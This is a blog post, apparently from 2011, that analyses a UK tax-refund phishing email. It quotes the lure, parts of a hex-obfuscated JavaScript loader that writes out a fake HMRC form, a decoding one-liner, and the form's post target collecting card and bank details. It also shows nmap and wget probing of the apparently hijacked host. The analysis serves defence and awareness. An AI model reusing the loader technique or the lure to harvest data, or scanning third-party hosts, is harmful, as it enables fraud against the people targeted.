I receive four or five of these sorts of phishing emails a week so I thought I’d take a quick look at one and see how it’s put together.<\/p>\n
Firstly a poorly constructed message from my- or more often someone else’s bank\/tax office. Note capitalisation, lack of whitespace after fullstop in the first sentence, no currency denomination (e.g. \u00c2\u00a3) for the amount but a realistic sum of money, definitely not $10,000,000 from the office of former attorney general Utoula of Lagos. Also note the threat of a deadline, even though none is stated.<\/p>\n
Dear Applicant:<\/p>\n
we have reviewed your tax return and our calculations of your last years accounts a tax refund of 178.25 is due.Please submit the tax refund request and allow us 3-6 days in order to process it.<\/p>\n
A refund can be delayed for a variety of reasons.
\nFor example submitting invalid records or applying after the deadline.<\/p>\nSubmit the form attached to your email in order to verify your card.<\/p><\/blockquote>\n
with an attachment: return_form.html . Who sends a plain text email with an attached HTML file? Nobody except scammers, that’s who. Saving out return_form.html (without the .html extension, for safety) and having a look I found this at the top:<\/p>\n
<script type=\"text\/javascript\" language=\"JavaScript\">\/\/ < ![CDATA[\r\n\/\/ Copyright \u00c2\u00a9 2005 Voormedia - WWW.VOORMEDIA.COM\r\nvar i,y,x=\"3c21444f43545950452048544d4c205055424c494320222d2f2f5733432f2f44544420485\r\n44d4c20342e3031205472616e736974696f6e616c2f2f454e222022687474703a2f2f7777772e77332e6\r\nf72672f54522f68746d6c342f6c6f6f73652e647464223e0d0a3c68746d6c206c616e673d22656e223e3\r\nc212d2d20496e7374616e6365426567696e2074656d706c6174653d22687474703a2f2f7777772e686d7\r\n2632e676f762e756b2f54656d706c617465732f5765622d436f6e76657267656e6365312e64777422206\r\n36f64654f75747369646548544d4c49734c6f636b65643d2266616c736522202d2d3e0d0a3c686561643\r\ne0d0a3c212d2d20496e7374616e6365426567696e4564697461626c65206e616d653d224d65746164617\r\n46122202d2d3e0d0a3c6d65746120687474702d65717569763d22436f6e74656e742d547970652220636\r\nf6e74656e743d22746578742f68746d6c3b20636861727365743d7574662d38223e20202020202020202\r\n00d0a3c6d65746120687474702d65717569763d22706963732d6c6162656c2220636f6e74656e743d272\r\n8706963732d312e312022687474703a2f2f7777772e696372612e6f72672f726174696e67737630322e6\r\n8746d6c22206c2067656e207472756520666f722022687474703a2f2f7777772e686d72632e676f762e7\r\n56b22207220286e7a203120767a2031206c7a2031206f7a203120637a2031292067656e2074727565206<\/code><\/script><\/code><\/pre>\nand this at the bottom:<\/p>\n
703a2f2f7777772e686d72632e676f762e756b2f696d616765732f626c616e6b2e6769662220616c\r\n743d22446972656374476f762220636c6173733d22646972656374676f765f6c6f676f2220746974\r\n6c653d22446972656374476f76223e3c2f613e3c2f6c693e0d0a2020202020203c2f756c3e0d0a20\r\n202020202020203c2f6469763e0d0a09093c212d2d20626567696e5f6578636c7564652d2d3e3c73\r\n637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f\r\n2f7777772e686d72632e676f762e756b2f50726f70686574496e736572742e6a73223e3c2f736372\r\n6970743e3c212d2d20656e645f6578636c7564652d2d3e0d0a3c2f6469763e0d0a0d0a3c2f626f64\r\n793e0d0a3c212d2d20496e7374616e6365456e64202d2d3e3c2f68746d6c3e0d0a0d0a\";y='';\r\nfor(i=0;i < x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);\r\n\/\/ ]]><\/code><\/pre>\n(I’ve cut out the middle section because it’s long and I’m only interested in the techniques.)<\/p>\n
So this is an obfuscated html page, entirely URL-encoded and embedded in a javascript string with a little bit of decoding tacked on the end. This is simple, but quite neat. Not a technique I’ve ever used to do anything “production” with. I cut the string out, saved it to a file and decoded it on the command line using CGI.pm<\/a>.<\/p>\n
perl -MCGI -e '$str= <>;for (my $i=0;$i < length $str;$i+=2){\r\n print CGI::unescape(sprintf q[%%%s], substr $str, $i,2)\r\n}' < return_form.data > return_form.decoded<\/code><\/pre>\nThe decoded page contains an HTML form requesting name, email address, physical address, card number, mother’s maiden name, phone number, national insurance number and bank account details where refund payment is to be made, including CVV. It posts all that delicious data over to … woah hold on, that’s not the HMRC is it?<\/p>\n
<td><form name=\"processForm\" method=\"post\" action=\"http:\/\/188.219.154.228\/id561sua\/javascript.php\" OnSubmit=\"return go_step2();\">\r\n<\/form><\/td><\/code><\/pre>\nSo who is it?<\/p>\n
host 188.219.154.228\r\n228.154.219.188.in-addr.arpa domain name pointer net-188-219-154-228.cust.dsl.vodafone.it.<\/code><\/pre>\nAn Italian Vodafone DSL customer, probably a hacked home PC, most likely part of a botnet infected by a virus of some sort.<\/p>\n
Let’s try poking the service:<\/p>\n
wget -O- http:\/\/188.219.154.228\/id561sua\/javascript.php\r\n--2011-10-25 13:40:49-- http:\/\/188.219.154.228\/id561sua\/javascript.php\r\nConnecting to 188.219.154.228:80... connected.\r\nHTTP request sent, awaiting response... 302 Found\r\nLocation: http:\/\/www.hmrc.gov.uk [following]<\/code><\/pre>\nok, that was a GET request and the script expects a POST, but it still bounces us straight out to hrmc.gov.uk, presumably logging whatever data was sent back in a database or IRC channel somewhere whilst leaving the unsuspecting user none the wiser.<\/p>\n
What about running services? Ok, let’s use nmap:<\/p>\n
nmap -PN 188.219.154.228\r\n\r\nStarting Nmap 5.51 ( http:\/\/nmap.org ) at 2011-10-25 13:44 BST\r\nNmap scan report for net-188-219-154-228.cust.dsl.vodafone.it (188.219.154.228)\r\nHost is up (0.10s latency).\r\nNot shown: 990 closed ports\r\nPORT STATE SERVICE\r\n80\/tcp open http\r\n135\/tcp open msrpc\r\n139\/tcp open netbios-ssn\r\n445\/tcp open microsoft-ds\r\n1027\/tcp open IIS\r\n1244\/tcp open isbconference1\r\n1433\/tcp open ms-sql-s\r\n1720\/tcp filtered H.323\/Q.931\r\n3306\/tcp open mysql\r\n3389\/tcp open ms-term-serv\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 7.69 seconds<\/code><\/pre>\nSo it’s running a few bits and pieces, things you wouldn’t normally open up given the choice..<\/p>\n
wget -O- -q http:\/\/188.219.154.228\/ | grep -i title\r\n<title>WAMPSERVER Homepage<\/title><\/code><\/pre>\nWAMP is a LAMP software stack built for Windows consisting of Apache, MySQL and PHP which explains some of the services this thing is running.<\/p>\n
Here I paused and went back to look at the message headers.<\/p>\n
Return-Path: < hmrc @return.co.uk>\r\n< snip >\r\nReceived: from User ([204.15.97.91]) by smtp.direktora.ru with Microsoft SMTPSVC(6.0.3790.4675);\r\n\t Tue, 25 Oct 2011 15:54:42 +0400\r\nFrom: \"HMRC\"< hmrc @return.co.uk>\r\nSubject: ***SPAM*** We have reviewed your tax return\r\nDate: Tue, 25 Oct 2011 07:54:42 -0400\r\nMIME-Version: 1.0\r\nContent-Type: multipart\/mixed;\r\n\tboundary=\"----=_NextPart_000_0100_01C2A9A6.3D97D7B2\"\r\nX-Priority: 3\r\nX-MSMail-Priority: Normal\r\nX-Mailer: Microsoft Outlook Express 6.00.2600.0000\r\nX-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000\r\nMessage-ID: < maindclqgdyxsvvr0ws0000024a @smtp.direktora.ru>\r\nX-OriginalArrivalTime: 25 Oct 2011 11:54:42.0679 (UTC) FILETIME=[E1F60870:01CC930C]\r\nTo: undisclosed-recipients:;<\/code><\/pre>\nA few things to highlight here – firsly the return address is return.co.uk (probably fictitious) not hmrc.gov.uk, as doing so could generate a large number of bounced messages sent back to HMRC and alerting them that there’s a phisher out there. Not that they can really do anything about it beyond cyber-investigation, but always good to keep things on the QT.<\/p>\n
Ignoring the fact that my MTA has flagged the subject as SPAM, the original SMTP server shows up as smtp.direktora.ru . Riiight, a UK Tax email sent through a mail server in Russia.<\/p>\n
Back to the spam detection. The headers injected by my MTA look like this:<\/p>\n
\r\nX-Virus-Scanned: Debian amavisd-new at psyphi.net\r\nX-Spam-Flag: YES\r\nX-Spam-Score: 6.105\r\nX-Spam-Level: ******\r\nX-Spam-Status: Yes, score=6.105 tagged_above=-9999 required=4.8\r\n\ttests=[BAYES_50=0.8, FORGED_MUA_OUTLOOK=1.927, FROM_MISSP_MSFT=1,\r\n\tMISSING_HEADERS=1.021, RCVD_IN_BL_SPAMCOP_NET=1.347,\r\n\tT_FROM_MISSPACED=0.01] autolearn=no<\/code><\/pre>\nGood. Forged Mail User Agent, which isn’t something you might easily spot visually, and blacklisted in spamcop to boot.<\/p>\n
Conclusions? Firstly don’t open attachments from untrusted sources. Duh, like I needed to tell you that. Secondly this is a UK-targetted scam, hosted on an Italian computer (probably) originating from Russia. This<\/a> stuff<\/a> is<\/a> real<\/strong><\/a>…<\/p>\n","protected":false},"excerpt":{"rendered":"
I receive four or five of these sorts of phishing emails a week so I thought I’d take a quick look at one and see how it’s put together. Firstly a poorly constructed message from my- or more often someone else’s bank\/tax office. Note capitalisation, lack of whitespace after fullstop in the first sentence, no … Continue reading “Phish Anatomy”<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[366],"tags":[604,705,704,707,706,1090],"class_list":["post-468","post","type-post","status-publish","format-standard","hentry","category-security","tag-email","tag-fraud","tag-phishing","tag-russia","tag-scam","tag-security"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/psyphi.net\/blog\/wp-json\/wp\/v2\/posts\/468","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/psyphi.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/psyphi.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/psyphi.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/psyphi.net\/blog\/wp-json\/wp\/v2\/comments?post=468"}],"version-history":[{"count":38,"href":"https:\/\/psyphi.net\/blog\/wp-json\/wp\/v2\/posts\/468\/revisions"}],"predecessor-version":[{"id":503,"href":"https:\/\/psyphi.net\/blog\/wp-json\/wp\/v2\/posts\/468\/revisions\/503"}],"wp:attachment":[{"href":"https:\/\/psyphi.net\/blog\/wp-json\/wp\/v2\/media?parent=468"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/psyphi.net\/blog\/wp-json\/wp\/v2\/categories?post=468"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/psyphi.net\/blog\/wp-json\/wp\/v2\/tags?post=468"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}